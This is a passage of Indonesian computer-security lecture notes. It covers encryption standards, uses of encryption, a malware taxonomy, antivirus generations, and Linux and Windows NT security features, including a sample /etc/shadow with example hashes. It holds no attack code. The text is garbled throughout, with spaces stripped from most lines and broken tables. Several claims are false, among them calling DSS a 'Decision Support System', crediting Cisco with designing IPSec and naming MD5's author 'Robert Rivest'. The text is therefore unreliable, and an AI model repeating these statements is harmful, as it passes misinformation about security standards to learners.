
1. DataEncryptionStandard(DES)
standarbagiUSAGovernment
didukungANSIdanIETF
popularuntukmetodesecretkey
terdiridari:40bit,56bitdan3x56bit(TripleDES)

2. AdvancedEncryptionStandard(AES)
untukmenggantikanDES(launchingakhir2001)
menggunakanvariablelengthblockchipper
keylength:128bit,192bit,256bit
dapatditerapkanuntuksmartcard.

3. DigitalCertificateServer(DCS)
verifikasiuntukdigitalsignature
autentikasiuser
menggunakanpublicdanprivatekey
contoh:NetscapeCertificateServer

4. IPSecurity(IPSec)
enkripsipublic/privatekey
dirancangolehCISCOSystem
menggunakanDES40bitdanauthentication
builtinpadaprodukCISCO
solusitepatuntukVirtualPrivateNetwork(VPN)danRemoteNetworkAccess

5. Kerberos
solusiuntukuserauthentication
Hal:15
KeamananKomputer
dapatmenanganimultipleplatform/system
freecharge(opensource)
IBMmenyediakanversikomersial:GlobalSignOn(GSO)

6. PointtopointTunnelingProtocol(PPTP),LayerTwoTunnelingProtocol(L2TP)
dirancangolehMicrosoft
autenticationberdasarkanPPP(Pointtopointprotocol)
enkripsiberdasarkanalgoritmMicrosoft(tidakterbuka)
terintegrasidenganNOSMicrosoft(NT,2000,XP)

7. RemoteAccessDialinUserService(RADIUS)
multipleremoteaccessdevicemenggunakan1databaseuntukauthentication
didukungoleh3com,CISCO,Ascend
tidakmenggunakanencryption

8. RSAEncryption
dirancangolehRivest,Shamir,Adlemantahun1977
standardefactodalamenkripsipublic/privatekey
didukungolehMicrosoft,apple,novell,sun,lotus
mendukungprosesauthentication
multiplatform

9. SecureHashAlgoritm(SHA)
dirancangolehNationalInstituteofStandardandTechnology(NIST)USA.
bagiandaristandarDSS(DecisionSupportSystem)USAdanbekerjasama
denganDESuntukdigitalsignature.
SHA1menyediakan160bitmessagedigest
Versi:SHA256,SHA384,SHA512(terintegrasidenganAES)

10. MD5
dirancangolehProf.RobertRivest(RSA,MIT)tahun1991
menghasilkan128bitdigest.
cepattapikurangaman

11. SecureShell(SSH)
digunakanuntukclientsideauthenticationantara2sistem
mendukungUNIX,windows,OS/2
melindungitelnetdanftp(filetransferprotocol)

12. SecureSocketLayer(SSL)
dirancangolehNetscape
menyediakanenkripsiRSApadalayessessiondarimodelOSI.
independenterhadapserviseyangdigunakan.
melindungisystemsecurewebecommerce
metodepublic/privatekeydandapatmelakukanauthentication
terintegrasidalamprodukbrowserdanwebserverNetscape.

13. SecurityToken
aplikasipenyimpananpassworddandatauserdismartcard

14. SimpleKeyManagementforInternetProtocol
sepertiSSLbekerjapadalevelsessionmodelOSI.
menghasilkankeyyangstatic,mudahbobol.

Hal:16
KeamananKomputer
APLIKASIENKRIPSI

Beberapaaplikasiyangmemerlukanenkripsiuntukpengamanandataataukomunikasi
diantaranyaadalah:

a.Jasatelekomunikasi
Enkripsiuntukmengamankaninformasikonfidensialbaikberupasuara,
data,maupungambaryangakandikirimkankelawanbicaranya.
Enkripsipadatransferdatauntukkeperluanmanajemenjaringandan
transferonlinedatabilling.
Enkripsiuntukmenjagacopyrightdariinformasiyangdiberikan.

b.Militerdanpemerintahan
Enkripsidiantaranyadigunakandalampengirimanpesan.
Menyimpandatadatarahasiamiliterdankenegaraandalammedia
penyimpanannyaselaludalamkeaadanterenkripsi.

c.DataPerbankan
Informasitransferuangantarbankharusselaludalamkeadaanterenkripsi

d.Datakonfidensialperusahaan
Rencanastrategis,formulaformulaproduk,databasepelanggan/karyawan
dandatabaseoperasional
pusatpenyimpanandataperusahaandapatdiaksessecaraonline.
Teknikenkripsijugaharusditerapkanuntukdatakonfidensialuntuk
melindungidatadaripembacaanmaupunperubahansecaratidaksah.

e.Pengamananelectronicmail
Mengamankanpadasaatditransmisikanmaupundalammedia
penyimpanan.
Aplikasienkripsitelahdibuatkhususuntukmengamankanemail,
diantaranyaPEM(PrivacyEnhancedMail)danPGP(PrettyGoodPrivacy),
keduanyaberbasisDESdanRSA.

f.KartuPlastik
EnkripsipadaSIMCard,kartuteleponumum,kartulanggananTVkabel,
kartukontrolaksesruangandankomputer,kartukredit,kartuATM,kartu
pemeriksaanmedis,dll
Enkripsiteknologipenyimpanandatasecaramagnetic,optik,maupunchip.

Hal:17
KeamananKomputer
KEAMANANDARIDEVILPROGRAM

Taksonomiancamanperangkatlunak/klasifikasiprogramjahat(maliciousprogram):

1. Programprogramyangmemerlukanprograminang(hostprogram).Fragmenprogram
tidak dapat mandiri secara independen dari suatu program aplikasi, program utilitas
atauprogramsistem.
2. Programprogramyangtidakmemerlukanprograminang.Programsendiriyangdapat
dijadwalkandandijalankanolehsistemoperasi.

Tipetipeprogramjahat:

1. Bacteria : program yang mengkonsumsi sumber daya sistem dengan mereplikasi

dirinya sendiri. Bacteria tidak secara eksplisit merusak file. Tujuan program ini hanya
satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya
mengeksekusiduakopiandirinyasecarasimultanpadasistemmultiprogrammingatau
menciptakanduafilebaru,masingmasingadalahkopianfileprogrambacteria.Kedua
kopianinkemudianmengkopiduakali,danseterusnya.

2. Logic bomb : logik yang ditempelkan pada program komputer agar memeriksa suatu
kumpulan kondisi di sistem. Ketika kondisikondisi yang dimaksud ditemui, logik
mengeksekusisuatufungsiyangmenghasilkanaksiaksitakdiotorisasi.
Logic bomb menempel pada suatu program resmi yang diset meledak ketika
kondisikondisitertentudipenuhi.
Contoh kondisikondisi untuk memicu logic bomb adalah ada atau tudak adanya
filefile tertentu, hari tertentu daru minggu atau tanggal, atau pemakai
menjalankan aplikasi tertentu. Begitu terpicu, bomb mengubah atau menghapus
dataatauseluruhfile,menyebabkanmesinterhenti,ataumengerjakanperusakan
lain.

3. Trapdoor:Titikmasuktakterdokumentasirahasiadisatuprogramuntukmemberikan
aksestanpametodemetodeotentifikasinormal.
Trapdoortelahdipakaisecarabenarselamabertahuntahunolehpemogramuntuk
mencarikesalahanprogram.Debuggingdantestingbiasanyadilakukanpemogram
saat mengembangkan aplikasi. Untuk program yang mempunyai prosedur
otentifikasi atau setup lama atau memerlukan pemakai memasukkan nilainilai
berbeda untuk menjalankan aplikasi maka debugging akan lama bila harus
melewati prosedurprosedur tersebut. Untuk debug program jenis ini,
pengembang membuat kewenangan khusus atau menghilangkan keperluan setup
danotentifikasi.
Trapdoor adalah kode yang menerima suatu barisan masukan khusus atau dipicu
dengan menjalankan ID pemakai tertentu atau barisan kejahatan tertentu.
Trapdoormenjadiancamanketikadigunakanpemrogramjahatuntukmemperoleh
pengkasesantakdiotorisasi.
Padakasusnyata,auditor(pemeriks)perangkatlunakdapatmenemukantrapdoor
pada produk perangkat lunak dimana nama pencipta perangkat lunak berlakuk
sebagaipasswordyangmemintasproteksiperangkatlunakyangdibuatnya.Adalah
sulitmengimplementasikankendalikendaliperangkatlunakuntuktrapdoor.

4. Trojan horse : Rutin tak terdokumentasi rahasia ditempelkan dalam satu program
berguna. Program yang berguna mengandung kode tersembunyi yang ketika
dijalankan melakukan suatu fungsi yang tak diinginkan. Eksekusi program
menyebabkaneksekusirutinrahasiaini.
Hal:18
KeamananKomputer
Programprogram trojan horse digunakan untuk melakukan fungsifungsi secara
tidak langsung dimana pemakai tak diotorisasi tidak dapat melakukannya secara
langsung. Contoh, untuk dapat mengakses filefile pemakai lain pada sistem
dipakaibersama,pemakaidapatmenciptakanprogramtrojanhorse.
Trojanhorseiniketikaprogramdieksekusiakanmengubahijinijinfilesehingafile
filedapatdibacaolehsembarangpemakai.Pencipta programdapatmenyebarkan
ke pemakaipemakai dengan menempatkan program di direktori bersama dan
menamaiprogramnyasedemikianrupasehinggadisangkasebagaiprogramutilitas
yangberguna.
Program trojan horse yang sulit dideteksi adalah kompilator yang dimodifikasi
sehingga menyisipkan kode tambahan ke programprogram tertentu begitu
dikompilasi, seperti program login. Kode menciptakan trapdoor pada program
login yang mengijinkan pencipta log ke sistem menggunakan password khusus.
Trojan horse jenis ini tak pernah dapat ditemukan jika hanya membaca program
sumber. Motivasi lain dari trojan horse adalah penghancuran data. Program
muncul sebagai melakukan fungsifungsi berguna (seperti kalkulator), tapi juga
secaradiamdiammenghapusfilefilepemakai.
Trojan horse biasa ditempelkan pada programprogram atau rutinrutin yang
diambildariBBS,internet,dansebagainya.

5. Virus : Kode yang ditempelkan dalam satu program yang menyebabkan pengkopian
dirinyadisisipkankesatuprogramlainataulebih,dengancaramemodifikasiprogram
programitu.
Modifikasi dilakukan dengan memasukkan kopian program virus yang dapat
menginfeksiprogramprogramlain.Selainhanyaprogasi,virusbiasanyamelakukan
fungsiyangtakdiinginkan.
Di dalam virus komputer, terdapat kode intruksi yang dapat membuat kopian
sempurna dirinya. Ketika komputer yang terinfeksi berhubungan (kontak) dengan
perangkat lunak yang belum terinfeksi, kopian virus memasuki program baru.
Infeksi dapat menyebar dari komputer ke komputer melalui pemakaipemakai
yang menukarkan disk atau mengirim program melalui jaringan. Pada lingkungan
jaringan, kemampuan mengakses aplikasi dan layananlayanan komputer lain
merupakanfasilitassempurnapenyebaranvirus.
Masalah yang ditimbulkan virus adalah virus sering merusak sistem komputer
sepertimenghapusfile,partisidisk,ataumengacaukanprogram.
SiklushidupVirusmelaluiempatfase(tahap),yaitu:
Fase tidur (dormant phase). Virus dalam keadaan menganggur. Virus akan
tibatiba aktif oleh suatu kejadian seperti tibanya tanggal tertentu,
kehadiran program atau file tertentu, atau kapasitas disk yang melewati
batas.Tidaksemuavirusmempunyaitahapini.
Fase propagasi (propagation phase). Virus menempatkan kopian dirinya ke
program lain atau daerah sistem tertentu di disk. Program yang terinfeksi
virus akan mempunyai kloning virus. Kloning virus itu dapat kembali
memasukifasepropagasi.
Fase pemicuan (triggering phase). Virus diaktifkan untuk melakukan fungsi
tertentu. Sepertipadafasetidur,fasepemicuandapatdisebabkanberagam
kejadiansistemtermasukpenghitunganjumlahkopiandirinya.
Fase eksekusi (execution phase). Virus menjalankan fungsinya, fungsinya
mungkin sepele seperti sekedar menampilkan pesan dilayar atau merusak
seperti merusak program dan filefile data, dan sebagainya. Kebanyakan
virusmelakukankerjanyauntuksuatusistemoperasitertentu,lebihspesifik
lagi pada platform perangkat keras tertentu. Virusvirus dirancang
memanfaatkanrincianrinciandankelemahankelemahansistemtertentu.

Hal:19
KeamananKomputer

Klasifikasitipevirus:
a. Parasitic virus. Merupakan virus tradisional dan bentuk virus yang paling
sering. Tipe ini mencantolkan dirinya ke file .exe. Virus mereplikasi ketika
programterinfeksidieksekusidenganmencarifilefile.exelainuntukdiinfeksi.
b. Memory resident virus. Virus memuatkan diri ke memori utama sebagai
bagian program yang menetap. Virus menginfeksi setiap program yang
dieksekusi.
c. Bootsectorvirus.Virusmenginfeksimasterbootrecordataubootrecorddan
menyebarsaatsistemdibootdaridiskyangberisivirus.
d. Stealth virus. Virus yang bentuknya telah dirancang agar dapat
menyembunyikandiridarideteksiperangkatlunakantivirus.
e. Polymorphic virus. Virus bermutasi setiap kali melakukan infeksi. Deteksi
dengan penandaan virus tersebut tidak dimungkinkan. Penulis virus dapat
melengkapi dengan alatalat bantu penciptaan virus baru (virus creation
toolkit, yaitu rutinrutin untuk menciptakan virusvirus baru). Dengan alat
bantuinipenciptaanvirusbarudapatdilakukandengancepat.Virusvirusyang
diciptakan dengan alat bantu biasanya kurang canggih dibanding virusvirus
yangdirancangdariawal.

6. Worm : Program yang dapat mereplikasi dirinya dan mengirim kopiankopian dari
komputer ke komputer lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk
mereplikasi dan progasai kembali. Selain hanya propagasi, worm biasanya melakukan
fungsiyangtakdiinginkan.
Network worm menggunakan hubungan jaringan untuk menyebar dari sistem ke
sistemlain.Sekaliaktifdi suatusistem,networkwormdapatberlakusepertivirus
ataubacteria,ataumenempelkanprogramtrojan horseataumelakukansejumlah
aksimenjengkelkanataumenghancurkan.
Untuk mereplikasi dirinya, network worm menggunakan suatu layanan jaringan,
seperti:Fasilitassuratelektronik(electronicmailfacility),yaituwormmengirimkan
kopiandirinyakesistemsistemlain.
Kemampuan eksekusi jarak jauh (remote execution capability), yaitu worm
mengeksekusikopiandirinyadisistemlain.
Kemampuanloginjarakjauh(remotelogincapability),yaituwormlogpadasistem
jauh sebagai pemakai dan kemudian menggunakan perintah untuk mengkopi
dirinyadarisatusistemkesistemlain.Kopianprogramwormyangbarukemudian
dijalankandisistemjauhdanmelakukanfungsifungsilainyangdilakukandisistem
itu,wormterusmenyebardengancarayangsama.
Network worm mempunyai ciriciri yang sama dengan virus komputer, yaitu
mempunyai fasefase sama, yaitu :Dormant phase, Propagation phase, Trigerring
phase,Executionphase.
Network worm juga berusaha menentukan apakah sistem sebelumnya telah
diinfeksisebelummengirimkopiandirinyakesistemitu.

Antivirus
Solusi ideal terhadap ancaman virus adalah pencegahan. Jaringan diijinkan virus masuk ke
sistem. Sasaran ini, tak mungkin dilaksanakan sepenuhnya. Pencegahan dapat mereduksi
sejumlah serangan virus. Setelah pencegahan terhadap masuknya virus, maka pendekatan
berikutnyayangdapatdilakukanadalah:
1. Deteksi.Begituinfeksitelahterjadi,tentukanapakahinfeksimemangtelahterjadidan
carilokasivirus.
2. Identifikasi.Begituvirusterdeteksimakaidentifikasivirusyangmenginfeksiprogram.
Hal:20
KeamananKomputer
3. Penghilangan. Begitu virus dapat diidentifikasi maka hilangkan semua jejak virus dari
programyangterinfeksidanprogramdikembalikankesemua(sebelumterinfeksi).Jika
deteksi virus sukses dilakukan, tapi identifikasi atau penghilangan jejak tidak dapat
dilakukan, maka alternatif yang dilakukan adalah menghapus program yang terinfeksi
dankopikembalibackupprogramyangmasihbersih.

Perkembanganprogramantivirusdapatdiperiodemenjadiempatgenerasi,yaitu:
1. Generasi pertama : sekedar scanner sederhana. Antivirus menscan program untuk
menemukan penanda (signature) virus. Walaupun virus mungkin berisi karakter
karakter varian, tapi secara esensi mempunyai struktur dan pola bit yang sama di
semuakopiannya.Teknisiniterbatasuntukdeteksivirusvirusyangtelahdikenal.Tipe
lain antivirus generasi pertama adalah mengelola rekaman panjang (ukuran) program
danmemeriksaperubahanpanjangprogram.
2. Generasi kedua : scanner yang pintar (heuristic scanner). Antivirus menscan tidak
bergantung pada penanda spesifik. Antivirus menggunakan aturanaturan pintar
(heuristicrules)untukmencarikemungkinaninfeksivirus.Teknikyangdipakaimisalnya
mencari fragmen fragmen kode yang sering merupakan bagian virus. Contohnya,
antivirus mencari awal loop enkripsi yang digunakan polymorphic virus dan
menemukankuncienkripsi.Begitukunciditemukan,antivirusdapatmendeskripsivirus
untuk identifikasi dan kemudian menghilangkan infeksi virus. Teknik ini adalah
pemeriksanaan integritas. Checksum dapat ditambahkan di tiap program. Jika virus
menginfeksi program tanpa mengubah checksum, maka pemeriksaan integritas akan
menemukan perubahan itu. Untuk menanggulangi virus canggih yang mampu
mengubah checksum saat menginfeksi program, fungsi hash terenkripsi digunakan.
Kunci enkripsi disimpan secara terpisah dari program sehingga program tidak dapat
menghasilkan kode hash baru dan mengenkripsinya. Dengan menggunakan fungsi
hash bukan checksum sederhana maka mencegah virus menyesuaikan program yang
menghasilkankodehashyangsamasepertisebelumnya.
3. Generasi ketiga : jebakanjebakan aktivitas (activity trap). Program antivirus
merupakan program yang menetap di memori (memory resident program). Program
ini mengidentifikasi virus melalui aksi aksinya bukan dari struktur program yang
diinfeksi. Dengan antivirus semacam in tak perlu mengembangkan penandapenanda
dan aturanaturan pintar untuk beragam virus yang sangat banyak. Dengan cara ini
yang diperlukan adalah mengidentifikasi kumpulan instruksi yang berjumlah sedikit
yang mengidentifikasi adanya usaha infeksi. Kalau muncul kejadian ini, program
antivirussegeramengintervensi.
4. Generasi keempat : proteksi penuh (full featured protection). Antivirus generasi ini
menggunakan beragam teknik antivirus secara bersamaan. Teknikteknik ini meliputi
scanning dan jebakanjebakan aktivitas. Antivirus juga mempunyai senarai kapabilitas
pengaksesan yang membatasi kemampuan virus memasuki sistem dan membatasi
kemampuan virus memodifikasi file untuk menginfeksi file. Pertempuran antara
penulis virus dan pembuat antivirus masih berlanjut. Walau beragam strategi lebih
lengkap telah dibuat untuk menanggulangi virus, penulis virus pun masih berlanjut
menulis virus yang dapat melewati barikadebarikade yang dibuat penulis antivirus.
Untuk pengaman sistem komputer, sebaiknya pengaksesandan pemakaian komputer
diawasidenganseksamasehinggatidakmenjalankanprogramataumemakaidiskyang
belum terjamin kebersihannya dari infeksi virus. Pencegahan terbaik terhadap
ancamanvirusadalahmencegahvirusmemasukisistemdisaatyangpertama.

Hal:21
KeamananKomputer

KEAMANANSISTEMOPERASI

Linux

KomponenArsitekturKeamananLinux:

1. AccountPemakai(useraccount)

Keuntungan:
Kekuasaandalamsatuaccountyaituroot,sehinggamudahdalamadministrasisystem.
Kecerobohansalahsatuusertidakberpengaruhkepadasystemsecarakeseluruhan.
Masingmasingusermemilikiprivacyyangketat

MacamUser:
Root : kontrolsystemfile,user,sumberdaya(devices)danaksesjaringan
User : accountdengankekuasaanyangdiaturolehrootdalammelakukanaktifitasdalam
system.
Group : kumpulanuseryangmemilikihaksharingyangsejenisterhadapsuatudevices
tertentu.

2. KontrolAksessecaraDiskresi(DiscretionaryAccesscontrol)

DiscretionaryAccesscontrol(DAC)adalahmetodepembatasanyangketat,yangmeliputi:
Setiapaccountmemilikiusernamedanpasswordsendiri.
Setiapfile/devicememilikiatribut(read/write/execution)kepemilikan,group,danuser
umum.

Virus tidak akan mencapai file system, jika sebuah user

terkena, maka akan berpengaruh pada file-file yang dimiliki
oleh user yang mengeksekusi file tersebut.

Jikakitalakukanlistsecaradetailmenggunakan$lsl,kitadapatmelihatpenerapanDACpada
filesystemlinux:

drwx5fadeusers1024Feb812:30Desktop
rwrr9Gohhack318Mar3009:05borg.dead.letter

rw r r 9 Goh hack 318 Mar 30 09:05 borg.dead.letter

1 2 3 4 5 6 7 8 9 10 11

Keterangan:

1= tipedarifile;tandadash()berarti
filebiasa,dberartidirectory,lberarti
filelink,dsb
5=
6=
7=
Jumlahlinkfile
Namapemilik(owner)
NamaGroup
2= Izinaksesuntukowner(pemilik),
r=read/baca,w=write/tulis,
x=execute/eksekusi
8=
9=
10=
Besarfiledalambyte
Bulandantanggalupdateterakhir
Waktuupdateterakhir
3= Izinaksesuntukgroup 11= Namafile/device
4= Izinaksesuntukother(userlainyang
beradadiluargroupyang
didefinisikansebelumnya)

Hal:22
KeamananKomputer

PerintahperintahpentingpadaDAC:
Mengubahizinaksesfile:
1. bu:chmod<u|g|o><+|><r|w|e>namafile,
contoh:
chmodu+xg+worborg.dead.letter;tambahkanakseseksekusi(e)untukuser(u),
tambahkanjugaakseswrite(w)untukgroup(g)dankurangiizinaksesread(r)untuk
other(o)user.
2. chmodmetodeoctal,bu:chmodnamafile,digitdash()pertamauntukizinakses
user,digitke2untukizinaksesgroupdandigitke3untukizinaksesother,berlaku
ketentuan:r(read)=4,w(write)=2,x(execute)=1dantanpaizinakses=0.
Contoh:
Chmod740borg.dead.letter
Berarti:bagifileborg.dead.letterberlaku
digitke17=4+2+1=izinaksesr,w,xpenuhuntukuser.
digitke24=4+0+0=izinaksesruntukgroup
digitke30=0+0+0=tanpaizinaksesuntukotheruser.

Mengubahkepemilikan:chown<owner/pemilik><namafile>
Mengubahkepemilikangroup:chgrp<groupowner><namafile>
Menggunakanaccountrootuntuksementara:
~$su ;systemakanmemintapassword
password:**** ;promptakanberubahjadipagar,tandaloginsebagairoot
~#

Mengaktifkanshadowpassword,yaitumembuatfile/etc/passwdmenjadidapatdibaca
(readable)tetapitidaklagiberisipassword,karenasudahdipindahkanke/etc/shadow

Contohtipikalfile/etc/passwdsetelahdiaktifkanshadow:

root:x:0:0::/root:/bin/bash
fade:x:1000:103:,,,:/home/fade:/bin/bash

Lihatuserfade,dapatkitabacasebagaiberikut:

username :fade
Password :x
UserID(UID) :1000
GroupID(GUID) :103
Keterangantambahan :
Homedirectory :/home/fade
Shelldefault :/bin/bash

Passwordnyabisadibaca(readable),tapiberupahurufxsaja,passwordsebenarnyadisimpan
difile/etc/shadowdalamkeadaandienkripsi:

root:pCfouljTBTX7o:10995:0:::::
fade:oiHQw6GBf4tiE:10995:0:99999:7:::

PerlunyaProaktifpassword

Hal:23
KeamananKomputer
LinuxmenggunakanmetodeDES(DataEncriptionStandart)untukpasswordnya.Userharusdi
training dalam memilih password yang akan digunakannya agar tidak mudah ditebak dengan
programprogramcrackpassworddalamancamanbrutoforceattack.Danperlupuladitambah
denganprogramBantucekkeamananpasswordseperti:
Passwd+ : meningkatkan loging dan mengingatkan user jika mengisi password yang
mudahditebak,ftp://ftp.dartmouth.edu/pub/security
Anlpasswd : dapat membuat aturan standar pengisian password seperti batas minimum,
gabungan huruf besar dengan huruf kecil, gabungan angka dan huruf dsb,
ftp://coast.rs.purdue.edu/pub/tools/unix/

3. Kontrolaksesjaringan(NetworkAccessControl)

Firewalllinux
1
:
alatpengontrolanaksesantarjaringanyangmembuatlinuxdapatmemilihhostyangberhak/
tidakberhakmengaksesnya.

FungsiFirewalllinux:
Analisadanfilteringpaket
Memeriksa paket TCP, lalu diperlakukan dengan kondisi yang sudah ditentukan, contoh
paketAlakukantindakanB.
Blockingcontentdanprotocol
Blokingisipaketsepertiappletjava,activeX,Vbscript,Cookies
Autentikasikoneksidanenkripsi
Menjalankan enkripsi dalam identitas user, integritas satu session dan melapisi data
denganalgoritmaenkripsiseperti:DES,tripleDES,Blowfish,IPSec,SHA,MD5,IDEA,dsb.

Tipefirewalllinux:
Applicationproxyfirewall/ApplicationGateways
DilakukanpadalevelaplikasidilayerOSI,systemproxyinimeneruskan/membagipaket
paketkedalamjaringaninternal.Contoh:softwareTISFWTK(TurstedInformationSystem
FirewallToolkit)
Network level Firewall, fungsi filter dan bloking paket dilakukan di router. Contoh :
TCPWrappers,aplikasinyaadadi/usr/sbin/tcpd.Carakerjanya:
Lihatisifile/etc/inetd.conf:
...
telnet stream tcp nowait root/usr/sbin/telnetd
shell stream tcp nowait root/usr/sbin/rshd
pop3 stream tcp nowait root/usr/sbin/pop3d

dengandiaktifkanTCPwrappersmakaisifile/etc/inetd.conf:
...
telnet stream tcp nowait root/usr/sbin/tcpdin.telnetd
shell stream tcp nowait root/usr/sbin/tcpdin.rshdL
pop3 stream tcp nowait root/usr/sbin/tcpdin.pop3d

setiapadapermintaanlayananjarakjauh,dipotongduludenganpencocokanrulesetyang
telahdiaturolehtcpin,jikamemenuhisyaratditeruskankefileyangakandiekseskusi,tapi
jikatidakmemenuhisyaratdigagalkan.

1
Untuk membedakan firewall yang built-in di linux dengan firewall dedicated yang banyak digunakan dalam
teknologi jaringan, maka digunakan istilah firewall linux.

Hal:24
KeamananKomputer

PengaturanTCPWrapperdilakukandenganmengkonfigurasi2file,yaitu:
/etc/host.allowhostyangdiperbolehkanmengakses.
/etc/host.denyhostyangtidakdiperbolehkanmengakses.

4. Enkripsi(encryption)

PenerapanEnkripsidilinux:
EnkripsipasswordmenggunakanDES(DataEncryptionStandard)
Enkripsikomunikasidata:
1. SecureShell(SSH)Programyangmelakukanlogingterhadapkomputerlaindalam
jaringan,mengeksekusiperintahlewatmesinsecararemotedanmemindahkanfile
darisatumesinkemesinlainnya.EnkripsidalambentukBlowfish,IDEA,RSA,Triple
DES.IsiSSHSuite:
scp(secureshellcopy)mengamankanpenggandaandata
ssh(secureshellclient)modelclientsshsepertitelnetterenkripsi.
sshagentotentikasilewatjaringandenganmodelRSA.
sshd(secureshellserver)diport22
sshkeygenpembuatkunci(keygenerator)untukssh
Konfigurasidilakukandi:
/etc/sshd_config(filekonfigurasiserver)
/etc/ssh_config(filekonfigurasiclient)
2. SecuresocketLayer(SSL)mengenkripsidatayangdikirimkanlewatporthttp.
Konfigurasidilakukandi:webserverAPACHEdenganditambahPATCHSSL.

5. Logging

Def:ProsedurdariSistemOperasiatauaplikasimerekamsetiapkejadiandanmenyimpan
rekamantersebutuntukdapatdianalisa.

Semuafileloglinuxdisimpandidirectory/var/log,antaralain:

Lastlog:rekamanuserloginterakhirkali
last:rekamanuseryangpernahlogindenganmencarinyapadafile/var/log/wtmp
xferlog : rekaman informasi login di ftp daemon berupa data wktu akses, durasi transfer
file, ip dan dns host yang mengakses, jumlah/nama file, tipe transfer(binary/ASCII), arah
transfer(incoming/outgoing), modus akses(anonymous/guest/user resmi),
nama/id/layananuserdanmetodeotentikasi.
Access_log:rekamanlayananhttp/webserver.
Error_log:rekamanpesankesalahanatasservicehttp/webserverberupadatajamdan
waktu,tipe/alasankesalahan
Messages:rekamankejadianpadakernelditanganiolehduadaemon:
o Syslogmerekamsemuaprogramyangdijalankan,konfigurasipadasyslog.conf
o Klogmenerimadanmerekamsemuapesankernel

6. DeteksiPenyusupan(IntrusionDetection)

Def:aktivitasmendeteksipenyusupansecaracepatdenganmenggunakanprogramkhusus
secaraotomatisyangdisebutIntrusionDetectionSystem

TipedasarIDS:
Hal:25
KeamananKomputer
Ruledbasedsystem:mencatatlalulintasdatajikasesuaidengandatabasedaritanda
penyusupanyangtelahdikenal,makalangsungdikategorikanpenyusupan.Pendekatan
Ruledbasedsystem:
o Preemptory(pencegahan);IDSakanmemperhatikansemualalulintasjaringan,dan
langsungbertindakjikadicurigaiadapenyusupan.
o Reactionary(reaksi);IDShanyamengamatifilelogsaja.
Adaptivesystem:penerapanexpertsystemdalammengamatilalulintasjaringan.

ProgramIDS:
Chkwtmp:programpengecekanterhadapentrykosong
Tcplogd:programpendeteksistealthscan(scanningyangdilakukantanpamembuat
sesitcp)
Hostentry:programpendeteksiloginanomaly(perilakuaneh)bizarrebehaviour
(perilakuaneh),timeanomalies(anomalywaktu),localanomaly.

WindowsNT

KomponenArsitekturKeamananNT:

1.AdminisrasiUserdanGroup

JenisAccountUser:
Administrator
Guest
User

JenisAccountGorup:
Administrator
Guest
User
Operatorbackup
Poweruser
Operatorserver
Operatoraccount
Operatorprinter

HakUser/Grup:
Hakbasic:accescomputerfromnetwork,backupfiles/directory,changesystemtime,
logonlocally,manageauditingandsecurity,log(eventviewer),restorefilesanddirectory,
shutdownsystem,takeownershipfilesorotherobject,dll.
Hakadvance:accessserviceandkerneluntukkebutuhanpengembangansystem.

2.KeamananuntuksystemFile

A.NTFS:
Cepatdalamoperasistandarfile(readwritesearch)
Terdapatsystemfilerecovery,accesscontroldanpermission.
Memandangobyeksebagaikumpulanatribut,termasukpermissionaccess.

B.Proteksiuntukintegritasdata

Hal:26
KeamananKomputer
Transaction logging : merupakan system file yang dapat direcovery untuk dapat mencatat
semuaperubahanterakhirpadadirectorydanfilesecaraotomatis.
JikatransaksisystemberhasilNTakanmelakukanpembaharuanpadafile.
Jikatransaksigagal,NTakanmelalui:
Tahap analisis : mengukur kerusakan dan menentukan lokasi cluster yang harus
diperbaruiperinformasidalamfilelog.
Tahap redo : melakukan semua tahapan transaksi yang dicatat pada titik periksa
terakhir
Tahap undo : mengembalikan ke kondisi semula untuk semua transaksi yang belum
selesaidikerjakan.

Sector sparing : Teknik dynamic data recovery yang hanya terdapat pada disk SCSI dengan
cara memanfaatkan teknologi faulttolerant volume untuk membuat duplikat data dari sector
yangmengalamierror.Metodenyaadalahdenganmerekalkulasidaristripesetwithparityatau
denganmembacasectordarimirrordrivedanmenulisdatatersebutkesektorbaru.

Cluster remapping : Jika ada kegagalan dalam transaksi I/O pada disk , secara otomatis akan
mencari cluster baru yang tidak rusak, lalu menandai alamat cluster yang mengandung bad
sectortersebut.

C.Faulttolerance:Kemampuanuntukmenyediakanredudansidatasecararealtimeyangakan
memberikantindakanpenyelamatanbilaterjadikegagalanperangkatkeras,korupsiperangkat
lunakdankemungkinanmasalahlainnya.
Teknologinya disebut RAID (Redudant Arrays of inexpensive Disk) : sebuah array disk dimana
dalamsebuahmediapenyimpananterdapatinformasiredudantentangdatayangdisimpandi
sisamediatersebut.
KelebihanRAID:
MeningkatkankinerjaI/O
meningkatkanreabilitasmediapenyimpanan

Ada2bentukfaulttolerance:
1. Diskmirroring(RAID1):meliputipenulisandatasecarasimultankeduamedia
penyimpananyangsecarafisikterpisah.
2. Disk stripping dengan Parity (RAID 5) : data ditulis dalam stripstrip lewat satu array disk
yang didalam stripstrip tersebut terdapat informasi parity yang dapat digunakan untuk
meregenerasidataapabilasalahsatudiskdevicedalamstripsetmengalamikegagalan.

3.ModelKeamananWindowsNT

Dibuat dari beberapa komponen yang bekerja secara bersamasama untuk memberikan
keamananlogondanaccesscontrollist(ACL)dalamNT:

LSA(LocalsecurityAuthority):menjaminusermemilikihakuntukmengaksessystem.Inti
keamananyangmenciptakanaksestoken,mengadministrasikebijakankeamananlocaldan
memberikanlayananotentikasiuser.
Proses logon : menerima permintaan logon dari user (logon interaktif dan logon remote),
menantimasukanusernamedanpasswordyangbenar.DibantuolehNetlogonservice.
Security Account Manager (SAM) : dikenal juga sebagai directory service database, yang
memeliharadatabaseuntukaccountuserdanmemberikanlayanvalidasiuntukprosesLSA.
SecurityReferenceMonitor(SRM):memeriksastatusizinuserdalammengakses,danhak
useruntukmemanipulasiobyeksertamembuatpesanpesanaudit.

Hal:27
KeamananKomputer
4.KeamananSumberdayalokal

ObyekdalamNT[file,folder(directory),proses,thread,sharedandevice],masingmasing
akandilengkapidenganObyekSecurityDescriptoryangterdiridari:
SecurityIDOwner:menunjukkanuser/grupyangmemilikiobyektersebut,yangmemiliki
kekuasaanuntukmengubahaksespermissionterhadapobyektersebut.
SecurityIDgroup:digunakanolehsubsistemPOSIXsaja.
DiscretionaryACL(AccessControlList):identifikasiuserdangrupyangdiperbolehkan/
ditolakdalammengakses,dikendalikanolehpemilikobyek.
SystemACL:mengendalikanpesanauditingyangdibangkitkanolehsystem,dikendalikan
olehadministratorkeamananjaringan.

5.KeamananJaringan

JenisKeamananJaringanWindowsNT:

